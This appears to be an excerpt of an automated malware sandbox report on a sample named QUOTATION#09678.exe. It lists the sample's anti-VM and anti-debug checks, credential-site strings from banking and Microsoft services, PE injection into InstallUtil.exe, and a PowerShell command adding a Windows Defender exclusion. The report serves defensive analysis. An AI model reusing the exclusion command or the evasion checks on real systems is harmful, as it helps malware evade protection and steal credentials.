                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Yara detected AntiVM3
                    Source: Yara matchFile source: Process Memory Space: QUOTATION#09678.exe PID: 764, type: MEMORYSTR
                    Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                    Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                    Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                    Source: QUOTATION#09678.exe, 00000000.00000002.2268426696.000002CC81774000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
                    Source: QUOTATION#09678.exe, 00000000.00000002.2268426696.000002CC81774000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                    Source: C:\Users\user\Desktop\QUOTATION#09678.exeMemory allocated: 2CCFF0F0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION#09678.exeMemory allocated: 2CCFF1F0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 1600000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 3060000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 5060000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6343Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3334Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 2873Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 6865Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 320Thread sleep time: -8301034833169293s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7276Thread sleep time: -33204139332677172s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: Amcache.hve.10.drBinary or memory string: VMware
                    Source: tmpEF0A.tmp.5.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                    Source: QUOTATION#09678.exe, 00000000.00000002.2268426696.000002CC81774000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                    Source: tmpEF0A.tmp.5.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                    Source: tmpEF0A.tmp.5.drBinary or memory string: global block list test formVMware20,11696428655
                    Source: Amcache.hve.10.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                    Source: QUOTATION#09678.exe, 00000000.00000002.2268426696.000002CC81774000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\'C:\WINDOWS\system32\drivers\vmmouse.sys&C:\WINDOWS\system32\drivers\vmhgfs.sys
                    Source: QUOTATION#09678.exe, 00000000.00000002.2268426696.000002CC81774000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWARE
                    Source: tmpEF0A.tmp.5.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                    Source: Amcache.hve.10.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                    Source: tmpEF0A.tmp.5.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                    Source: Amcache.hve.10.drBinary or memory string: vmci.sys
                    Source: tmpEF0A.tmp.5.drBinary or memory string: AMC password management pageVMware20,11696428655
                    Source: tmpEF0A.tmp.5.drBinary or memory string: tasks.office.comVMware20,11696428655o
                    Source: QUOTATION#09678.exe, 00000000.00000002.2268426696.000002CC81774000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\WINDOWS\system32\drivers\vmmouse.sys
                    Source: QUOTATION#09678.exe, 00000000.00000002.2268426696.000002CC81774000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
                    Source: tmpEF0A.tmp.5.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                    Source: tmpEF0A.tmp.5.drBinary or memory string: interactivebrokers.comVMware20,11696428655
                    Source: QUOTATION#09678.exe, 00000000.00000002.2268426696.000002CC81774000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\WINDOWS\system32\drivers\vmhgfs.sys
                    Source: tmpEF0A.tmp.5.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                    Source: Amcache.hve.10.drBinary or memory string: VMware20,1
                    Source: Amcache.hve.10.drBinary or memory string: Microsoft Hyper-V Generation Counter
                    Source: Amcache.hve.10.drBinary or memory string: NECVMWar VMware SATA CD00
                    Source: Amcache.hve.10.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                    Source: tmpEF0A.tmp.5.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                    Source: Amcache.hve.10.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                    Source: Amcache.hve.10.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                    Source: Amcache.hve.10.drBinary or memory string: VMware PCI VMCI Bus Device
                    Source: QUOTATION#09678.exe, 00000000.00000002.2268426696.000002CC81774000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: noValueButYesKey)C:\WINDOWS\system32\drivers\VBoxMouse.sys
                    Source: QUOTATION#09678.exe, 00000000.00000002.2268426696.000002CC81774000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\WINDOWS\system32\drivers\VBoxMouse.sys
                    Source: Amcache.hve.10.drBinary or memory string: VMware VMCI Bus Device
                    Source: Amcache.hve.10.drBinary or memory string: VMware Virtual RAM
                    Source: Amcache.hve.10.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                    Source: tmpEF0A.tmp.5.drBinary or memory string: bankofamerica.comVMware20,11696428655x
                    Source: tmpEF0A.tmp.5.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                    Source: Amcache.hve.10.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                    Source: tmpEF0A.tmp.5.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                    Source: Amcache.hve.10.drBinary or memory string: VMware Virtual USB Mouse
                    Source: Amcache.hve.10.drBinary or memory string: vmci.syshbin
                    Source: Amcache.hve.10.drBinary or memory string: VMware, Inc.
                    Source: tmpEF0A.tmp.5.drBinary or memory string: discord.comVMware20,11696428655f
                    Source: Amcache.hve.10.drBinary or memory string: VMware20,1hbin@
                    Source: Amcache.hve.10.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                    Source: Amcache.hve.10.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                    Source: tmpEF0A.tmp.5.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                    Source: Amcache.hve.10.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                    Source: tmpEF0A.tmp.5.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                    Source: tmpEF0A.tmp.5.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                    Source: tmpEF0A.tmp.5.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                    Source: QUOTATION#09678.exe, 00000000.00000002.2268426696.000002CC81774000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
                    Source: QUOTATION#09678.exe, 00000000.00000002.2268426696.000002CC81774000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA II
                    Source: tmpEF0A.tmp.5.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                    Source: Amcache.hve.10.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                    Source: tmpEF0A.tmp.5.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                    Source: tmpEF0A.tmp.5.drBinary or memory string: outlook.office365.comVMware20,11696428655t
                    Source: tmpEF0A.tmp.5.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                    Source: Amcache.hve.10.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                    Source: tmpEF0A.tmp.5.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                    Source: tmpEF0A.tmp.5.drBinary or memory string: outlook.office.comVMware20,11696428655s
                    Source: tmpEF0A.tmp.5.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                    Source: tmpEF0A.tmp.5.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
                    Source: Amcache.hve.10.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                    Source: Amcache.hve.10.drBinary or memory string: vmci.syshbin`
                    Source: tmpEF0A.tmp.5.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                    Source: Amcache.hve.10.drBinary or memory string: \driver\vmci,\driver\pci
                    Source: InstallUtil.exe, 00000005.00000002.2386152659.0000000001338000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlln
                    Source: QUOTATION#09678.exe, 00000000.00000002.2268426696.000002CC81774000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
                    Source: tmpEF0A.tmp.5.drBinary or memory string: dev.azure.comVMware20,11696428655j
                    Source: Amcache.hve.10.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                    Source: tmpEF0A.tmp.5.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                    Source: Amcache.hve.10.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                    Source: tmpEF0A.tmp.5.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION#09678.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION#09678.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION#09678.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION#09678.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Adds a directory exclusion to Windows Defender
                    Source: C:\Users\user\Desktop\QUOTATION#09678.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\QUOTATION#09678.exe" -Force
                    Source: C:\Users\user\Desktop\QUOTATION#09678.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\QUOTATION#09678.exe" -ForceJump to behavior
                    Allocates memory in foreign processes
                    Source: C:\Users\user\Desktop\QUOTATION#09678.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 protect: page execute and read and writeJump to behavior
                    Injects a PE file into a foreign processes
                    Source: C:\Users\user\Desktop\QUOTATION#09678.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5AJump to behavior
                    Writes to foreign memory regions
                    Source: C:\Users\user\Desktop\QUOTATION#09678.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000Jump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION#09678.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000Jump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION#09678.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 41A000Jump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION#09678.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 41C000Jump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION#09678.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: F1D008Jump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION#09678.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\QUOTATION#09678.exe" -ForceJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION#09678.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION#09678.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION#09678.exeQueries volume information: C:\Users\user\Desktop\QUOTATION#09678.exe VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
